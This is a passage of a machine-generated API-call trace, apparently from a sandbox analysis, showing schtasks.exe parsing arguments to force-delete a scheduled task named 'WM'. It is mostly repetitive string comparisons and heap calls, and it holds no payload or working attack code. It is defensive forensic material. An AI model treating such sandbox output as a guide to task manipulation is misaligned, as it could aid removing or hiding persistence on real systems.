(lpString="tn") returned 2 [0142.880] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.880] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0142.880] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0142.880] lstrlenW (lpString="|create|") returned 8 [0142.880] lstrlenW (lpString="|tn|") returned 4 [0142.880] StrStrIW (lpFirst="|create|", lpSrch="|tn|") returned 0x0 [0142.880] RtlRestoreLastWin32Error () returned 0x490 [0142.880] lstrlenW (lpString="delete") returned 6 [0142.880] lstrlenW (lpString="delete") returned 6 [0142.881] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.881] lstrlenW (lpString="tn") returned 2 [0142.881] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.881] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0142.881] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0142.881] lstrlenW (lpString="|delete|") returned 8 [0142.881] lstrlenW (lpString="|tn|") returned 4 [0142.881] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0142.881] RtlRestoreLastWin32Error () returned 0x490 [0142.881] lstrlenW (lpString="query") returned 5 [0142.881] lstrlenW (lpString="query") returned 5 [0142.881] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.881] lstrlenW (lpString="tn") returned 2 [0142.881] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.881] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0142.881] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0142.881] lstrlenW (lpString="|query|") returned 7 [0142.881] lstrlenW (lpString="|tn|") returned 4 [0142.881] StrStrIW (lpFirst="|query|", lpSrch="|tn|") returned 0x0 [0142.881] RtlRestoreLastWin32Error () returned 0x490 [0142.881] lstrlenW (lpString="change") returned 6 [0142.881] lstrlenW (lpString="change") returned 6 [0142.881] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.881] lstrlenW (lpString="tn") returned 2 [0142.881] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.881] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0142.881] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0142.882] lstrlenW (lpString="|change|") returned 8 [0142.882] lstrlenW (lpString="|tn|") returned 4 [0142.882] StrStrIW (lpFirst="|change|", lpSrch="|tn|") returned 0x0 [0142.882] RtlRestoreLastWin32Error () returned 0x490 [0142.882] lstrlenW (lpString="run") returned 3 [0142.882] lstrlenW (lpString="run") returned 3 [0142.882] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.882] lstrlenW (lpString="tn") returned 2 [0142.882] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.882] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0142.882] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0142.882] lstrlenW (lpString="|run|") returned 5 [0142.882] lstrlenW (lpString="|tn|") returned 4 [0142.882] StrStrIW (lpFirst="|run|", lpSrch="|tn|") returned 0x0 [0142.882] RtlRestoreLastWin32Error () returned 0x490 [0142.882] lstrlenW (lpString="end") returned 3 [0142.882] lstrlenW (lpString="end") returned 3 [0142.882] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.882] lstrlenW (lpString="tn") returned 2 [0142.882] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.882] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0142.882] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0142.882] lstrlenW (lpString="|end|") returned 5 [0142.882] lstrlenW (lpString="|tn|") returned 4 [0142.882] StrStrIW (lpFirst="|end|", lpSrch="|tn|") returned 0x0 [0142.882] RtlRestoreLastWin32Error () returned 0x490 [0142.882] lstrlenW (lpString="showsid") returned 7 [0142.883] lstrlenW (lpString="showsid") returned 7 [0142.883] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.883] GetProcessHeap () returned 0x4770000 [0142.883] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779448) returned 1 [0142.883] GetProcessHeap () returned 0x4770000 [0142.883] RtlReAllocateHeap (Heap=0x4770000, Flags=0xc, Ptr=0x4779448, Size=0x16) returned 0x4779628 [0142.883] lstrlenW (lpString="tn") returned 2 [0142.883] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.883] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0142.883] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|tn|") returned 4 [0142.883] lstrlenW (lpString="|showsid|") returned 9 [0142.883] lstrlenW (lpString="|tn|") returned 4 [0142.883] StrStrIW (lpFirst="|showsid|", lpSrch="|tn|") returned 0x0 [0142.883] RtlRestoreLastWin32Error () returned 0x490 [0142.883] RtlRestoreLastWin32Error () returned 0x490 [0142.883] RtlRestoreLastWin32Error () returned 0x0 [0142.883] lstrlenW (lpString="/tn") returned 3 [0142.883] StrChrIW (lpStart="/tn", wMatch=0x3a) returned 0x0 [0142.883] RtlRestoreLastWin32Error () returned 0x490 [0142.883] RtlRestoreLastWin32Error () returned 0x0 [0142.883] lstrlenW (lpString="/tn") returned 3 [0142.883] GetProcessHeap () returned 0x4770000 [0142.883] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x8) returned 0x4776bf0 [0142.883] GetProcessHeap () returned 0x4770000 [0142.883] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779348 [0142.883] RtlRestoreLastWin32Error () returned 0x0 [0142.883] RtlRestoreLastWin32Error () returned 0x0 [0142.883] lstrlenW (lpString="WM") returned 2 [0142.883] lstrlenW (lpString="-/") returned 2 [0142.883] StrChrIW (lpStart="-/", wMatch=0x2c0057) returned 0x0 [0142.883] RtlRestoreLastWin32Error () returned 0x490 [0142.883] RtlRestoreLastWin32Error () returned 0x490 [0142.884] RtlRestoreLastWin32Error () returned 0x0 [0142.884] lstrlenW (lpString="WM") returned 2 [0142.884] StrChrIW (lpStart="WM", wMatch=0x3a) returned 0x0 [0142.884] RtlRestoreLastWin32Error () returned 0x490 [0142.884] RtlRestoreLastWin32Error () returned 0x0 [0142.884] lstrlenW (lpString="WM") returned 2 [0142.884] GetProcessHeap () returned 0x4770000 [0142.884] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x6) returned 0x47727c8 [0142.884] GetProcessHeap () returned 0x4770000 [0142.884] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47794a8 [0142.884] RtlRestoreLastWin32Error () returned 0x0 [0142.884] RtlRestoreLastWin32Error () returned 0x0 [0142.884] lstrlenW (lpString="/F") returned 2 [0142.884] lstrlenW (lpString="-/") returned 2 [0142.884] StrChrIW (lpStart="-/", wMatch=0x2c002f) returned="/" [0142.884] lstrlenW (lpString="?") returned 1 [0142.884] lstrlenW (lpString="?") returned 1 [0142.884] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.884] lstrlenW (lpString="F") returned 1 [0142.885] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.885] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3 [0142.885] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0142.885] lstrlenW (lpString="|?|") returned 3 [0142.885] lstrlenW (lpString="|F|") returned 3 [0142.885] StrStrIW (lpFirst="|?|", lpSrch="|F|") returned 0x0 [0142.885] RtlRestoreLastWin32Error () returned 0x490 [0142.885] lstrlenW (lpString="create") returned 6 [0142.886] lstrlenW (lpString="create") returned 6 [0142.886] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.886] lstrlenW (lpString="F") returned 1 [0142.886] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.886] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8 [0142.886] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0142.886] lstrlenW (lpString="|create|") returned 8 [0142.886] lstrlenW (lpString="|F|") returned 3 [0142.886] StrStrIW (lpFirst="|create|", lpSrch="|F|") returned 0x0 [0142.886] RtlRestoreLastWin32Error () returned 0x490 [0142.886] lstrlenW (lpString="delete") returned 6 [0142.886] lstrlenW (lpString="delete") returned 6 [0142.886] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.886] lstrlenW (lpString="F") returned 1 [0142.886] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.886] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8 [0142.886] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0142.886] lstrlenW (lpString="|delete|") returned 8 [0142.886] lstrlenW (lpString="|F|") returned 3 [0142.886] StrStrIW (lpFirst="|delete|", lpSrch="|F|") returned 0x0 [0142.886] RtlRestoreLastWin32Error () returned 0x490 [0142.886] lstrlenW (lpString="query") returned 5 [0142.886] lstrlenW (lpString="query") returned 5 [0142.886] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.886] lstrlenW (lpString="F") returned 1 [0142.886] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.886] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7 [0142.886] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0142.886] lstrlenW (lpString="|query|") returned 7 [0142.886] lstrlenW (lpString="|F|") returned 3 [0142.887] StrStrIW (lpFirst="|query|", lpSrch="|F|") returned 0x0 [0142.887] RtlRestoreLastWin32Error () returned 0x490 [0142.887] lstrlenW (lpString="change") returned 6 [0142.887] lstrlenW (lpString="change") returned 6 [0142.887] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.887] lstrlenW (lpString="F") returned 1 [0142.887] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.887] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8 [0142.887] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0142.887] lstrlenW (lpString="|change|") returned 8 [0142.887] lstrlenW (lpString="|F|") returned 3 [0142.887] StrStrIW (lpFirst="|change|", lpSrch="|F|") returned 0x0 [0142.887] RtlRestoreLastWin32Error () returned 0x490 [0142.887] lstrlenW (lpString="run") returned 3 [0142.887] lstrlenW (lpString="run") returned 3 [0142.887] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.887] lstrlenW (lpString="F") returned 1 [0142.887] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.887] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5 [0142.887] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0142.887] lstrlenW (lpString="|run|") returned 5 [0142.887] lstrlenW (lpString="|F|") returned 3 [0142.887] StrStrIW (lpFirst="|run|", lpSrch="|F|") returned 0x0 [0142.887] RtlRestoreLastWin32Error () returned 0x490 [0142.887] lstrlenW (lpString="end") returned 3 [0142.887] lstrlenW (lpString="end") returned 3 [0142.887] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.887] lstrlenW (lpString="F") returned 1 [0142.887] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.887] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5 [0142.887] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0142.887] lstrlenW (lpString="|end|") returned 5 [0142.888] lstrlenW (lpString="|F|") returned 3 [0142.888] StrStrIW (lpFirst="|end|", lpSrch="|F|") returned 0x0 [0142.888] RtlRestoreLastWin32Error () returned 0x490 [0142.888] lstrlenW (lpString="showsid") returned 7 [0142.888] lstrlenW (lpString="showsid") returned 7 [0142.888] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.888] lstrlenW (lpString="F") returned 1 [0142.888] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.888] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9 [0142.888] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|F|") returned 3 [0142.888] lstrlenW (lpString="|showsid|") returned 9 [0142.888] lstrlenW (lpString="|F|") returned 3 [0142.888] StrStrIW (lpFirst="|showsid|", lpSrch="|F|") returned 0x0 [0142.888] RtlRestoreLastWin32Error () returned 0x490 [0142.888] RtlRestoreLastWin32Error () returned 0x490 [0142.888] RtlRestoreLastWin32Error () returned 0x0 [0142.888] lstrlenW (lpString="/F") returned 2 [0142.888] StrChrIW (lpStart="/F", wMatch=0x3a) returned 0x0 [0142.888] RtlRestoreLastWin32Error () returned 0x490 [0142.888] RtlRestoreLastWin32Error () returned 0x0 [0142.888] lstrlenW (lpString="/F") returned 2 [0142.888] GetProcessHeap () returned 0x4770000 [0142.888] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x6) returned 0x47765b8 [0142.891] GetProcessHeap () returned 0x4770000 [0142.891] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47794c8 [0142.891] RtlRestoreLastWin32Error () returned 0x0 [0142.891] GetProcessHeap () returned 0x4770000 [0142.891] GetProcessHeap () returned 0x4770000 [0142.891] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776bf0) returned 1 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776bf0) returned 0x8 [0142.892] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776bf0) returned 1 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779348) returned 1 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779348) returned 0x14 [0142.892] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779348) returned 1 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47727c8) returned 1 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47727c8) returned 0x6 [0142.892] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47727c8) returned 1 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47794a8) returned 1 [0142.892] GetProcessHeap () returned 0x4770000 [0142.892] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47794a8) returned 0x14 [0142.892] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47794a8) returned 1 [0142.893] GetProcessHeap () returned 0x4770000 [0142.893] GetProcessHeap () returned 0x4770000 [0142.893] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47765b8) returned 1 [0142.893] GetProcessHeap () returned 0x4770000 [0142.893] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47765b8) returned 0x6 [0142.893] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47765b8) returned 1 [0142.893] GetProcessHeap () returned 0x4770000 [0142.893] GetProcessHeap () returned 0x4770000 [0142.893] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47794c8) returned 1 [0142.893] GetProcessHeap () returned 0x4770000 [0142.893] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47794c8) returned 0x14 [0142.893] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47794c8) returned 1 [0142.893] GetProcessHeap () returned 0x4770000 [0142.893] GetProcessHeap () returned 0x4770000 [0142.893] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777370) returned 1 [0142.893] GetProcessHeap () returned 0x4770000 [0142.893] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777370) returned 0x10 [0142.893] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777370) returned 1 [0142.893] RtlRestoreLastWin32Error () returned 0x0 [0142.893] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18 [0142.893] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b [0142.893] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b [0142.894] RtlVerifyVersionInfo (VersionInfo=0xdf890, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0 [0142.894] RtlRestoreLastWin32Error () returned 0x0 [0142.894] lstrlenW (lpString="delete") returned 6 [0142.894] StrChrIW (lpStart="delete", wMatch=0x7c) returned 0x0 [0142.894] RtlRestoreLastWin32Error () returned 0x490 [0142.894] RtlRestoreLastWin32Error () returned 0x0 [0142.894] lstrlenW (lpString="delete") returned 6 [0142.894] GetProcessHeap () returned 0x4770000 [0142.894] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779448 [0142.894] GetProcessHeap () returned 0x4770000 [0142.894] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777370 [0142.894] _memicmp (_Buf1=0x4777370, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.894] GetProcessHeap () returned 0x4770000 [0142.894] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x16) returned 0x4779548 [0142.894] RtlRestoreLastWin32Error () returned 0x0 [0142.894] _memicmp (_Buf1=0x4777448, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.894] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4778c60, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20 [0142.894] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdf99c | out: lpdwHandle=0xdf99c) returned 0x76c [0142.894] GetProcessHeap () returned 0x4770000 [0142.894] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x776) returned 0x4779d38 [0142.894] GetFileVersionInfoExW (in: dwFlags=0x3, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", dwHandle=0x0, dwLen=0x776, lpData=0x4779d38 | out: lpData=0x4779d38) returned 1 [0142.895] VerQueryValueW (in: pBlock=0x4779d38, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdf9a4, puLen=0xdf9a8 | out: lplpBuffer=0xdf9a4*=0x477a0e8, puLen=0xdf9a8) returned 1 [0142.895] _memicmp (_Buf1=0x4777448, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.895] _vsnwprintf (in: _Buffer=0x4778c60, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0xdf988 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37 [0142.895] VerQueryValueW (in: pBlock=0x4779d38, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0xdf9b4, puLen=0xdf9b0 | out: lplpBuffer=0xdf9b4*=0x4779f18, puLen=0xdf9b0) returned 1 [0142.895] lstrlenW (lpString="schtasks.exe") returned 12 [0142.895] lstrlenW (lpString="schtasks.exe") returned 12 [0142.895] lstrlenW (lpString=".EXE") returned 4 [0142.895] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe" [0142.895] lstrlenW (lpString="schtasks.exe") returned 12 [0142.895] lstrlenW (lpString=".EXE") returned 4 [0142.895] lstrlenW (lpString="schtasks") returned 8 [0142.895] lstrlenW (lpString="/delete") returned 7 [0142.895] _memicmp (_Buf1=0x4777448, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.895] _vsnwprintf (in: _Buffer=0x4778c60, _BufferCount=0x19, _Format="%s %s", _ArgList=0xdf988 | out: _Buffer="schtasks /delete") returned 16 [0142.895] _memicmp (_Buf1=0x4777400, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.895] GetProcessHeap () returned 0x4770000 [0142.895] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779348 [0142.895] _memicmp (_Buf1=0x4777328, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.895] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x477a718, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17 [0142.895] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23 [0142.895] GetProcessHeap () returned 0x4770000 [0142.895] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x30) returned 0x4777050 [0142.896] _vsnwprintf (in: _Buffer=0x4776960, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0xdf98c | out: _Buffer="Type \"SCHTASKS /DELETE /?\" for usage.") returned 37 [0142.896] GetProcessHeap () returned 0x4770000 [0142.896] GetProcessHeap () returned 0x4770000 [0142.896] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779d38) returned 1 [0142.896] GetProcessHeap () returned 0x4770000 [0142.896] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779d38) returned 0x776 [0142.896] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779d38) returned 1 [0142.896] RtlRestoreLastWin32Error () returned 0x0 [0142.896] GetThreadLocale () returned 0x409 [0142.896] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.896] lstrlenW (lpString="delete") returned 6 [0142.896] GetThreadLocale () returned 0x409 [0142.896] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.897] lstrlenW (lpString="?") returned 1 [0142.897] GetThreadLocale () returned 0x409 [0142.897] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.897] lstrlenW (lpString="s") returned 1 [0142.897] GetThreadLocale () returned 0x409 [0142.897] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.897] lstrlenW (lpString="u") returned 1 [0142.897] GetThreadLocale () returned 0x409 [0142.897] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.897] lstrlenW (lpString="p") returned 1 [0142.898] GetThreadLocale () returned 0x409 [0142.898] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.898] lstrlenW (lpString="tn") returned 2 [0142.898] GetThreadLocale () returned 0x409 [0142.898] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.898] lstrlenW (lpString="f") returned 1 [0142.898] GetThreadLocale () returned 0x409 [0142.898] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2 [0142.898] lstrlenW (lpString="hresult") returned 7 [0142.898] RtlRestoreLastWin32Error () returned 0x0 [0142.898] RtlRestoreLastWin32Error () returned 0x0 [0142.898] lstrlenW (lpString="/delete") returned 7 [0142.898] lstrlenW (lpString="-/") returned 2 [0142.898] StrChrIW (lpStart="-/", wMatch=0x2c002f) returned="/" [0142.898] lstrlenW (lpString="delete") returned 6 [0142.898] lstrlenW (lpString="delete") returned 6 [0142.898] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.898] lstrlenW (lpString="delete") returned 6 [0142.898] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.898] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|delete|") returned 8 [0142.898] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|delete|") returned 8 [0142.898] lstrlenW (lpString="|delete|") returned 8 [0142.898] lstrlenW (lpString="|delete|") returned 8 [0142.898] StrStrIW (lpFirst="|delete|", lpSrch="|delete|") returned="|delete|" [0142.899] RtlRestoreLastWin32Error () returned 0x0 [0142.899] RtlRestoreLastWin32Error () returned 0x0 [0142.899] RtlRestoreLastWin32Error () returned 0x0 [0142.899] lstrlenW (lpString="/tn") returned 3 [0142.899] lstrlenW (lpString="-/") returned 2 [0142.899] StrChrIW (lpStart="-/", wMatch=0x2c002f) returned="/" [0142.899] lstrlenW (lpString="delete") returned 6 [0142.899] lstrlenW (lpString="delete") returned 6 [0142.899] _memicmp (_Buf1=0x4777418, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.899] lstrlenW (lpString="tn") returned 2 [0142.899] _memicmp (_Buf1=0x47773e8, _Buf2=0x2d2708, _Size=0x7) returned 0 [0142.899] _vsnwprintf (in: _Buffer=0x4779628, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|delete|") returned 8 [0142.899] _vsnwprintf (in: _Buffer=0x4779428, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdf978 | out: _Buffer="|tn|") returned 4 [0142.899] lstrlenW (lpString="|delete|") returned 8 [0142.899] lstrlenW (lpString="|tn|") returned 4 [0142.899] StrStrIW (lpFirst="|delete|", lpSrch="|tn|") returned 0x0 [0142.899] RtlRestoreLastWin32Error () returned 0x490 [0142.899] lstrlenW (lpString="?") returned 1 [0142.899] 